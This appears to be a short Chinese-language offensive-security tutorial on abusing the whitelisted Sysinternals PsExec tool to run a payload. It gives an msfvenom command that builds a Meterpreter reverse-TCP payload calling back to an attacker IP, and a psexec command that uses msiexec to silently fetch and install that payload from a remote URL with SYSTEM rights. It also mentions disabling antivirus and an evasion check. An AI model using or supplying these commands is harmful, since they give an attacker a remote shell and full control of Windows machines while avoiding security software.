当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x01 psexec.exe简介
PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性。在windows系统并未默认安装,下载地址见参考文章。
0x02 psexec执行payload
生成木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > /var/www/html/win_re.txtpsexec执行payload:
psexec.exe -s -d msiexec /q /i http://yourservice/shell/win_re.txt
//-s 以system权限执行
// -d 不产生交互式窗口执行命令时360和火绒都会报警:
关闭杀毒软件,可正常建立会话:
vt免杀结果:
参考链接:
psexec下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
psexec官方文档:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec#using-psexec
psexec执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/83_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95PsExec%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%B8%89%E5%AD%A3.html
虽然我们生活在阴沟里,但依然有人仰望星空!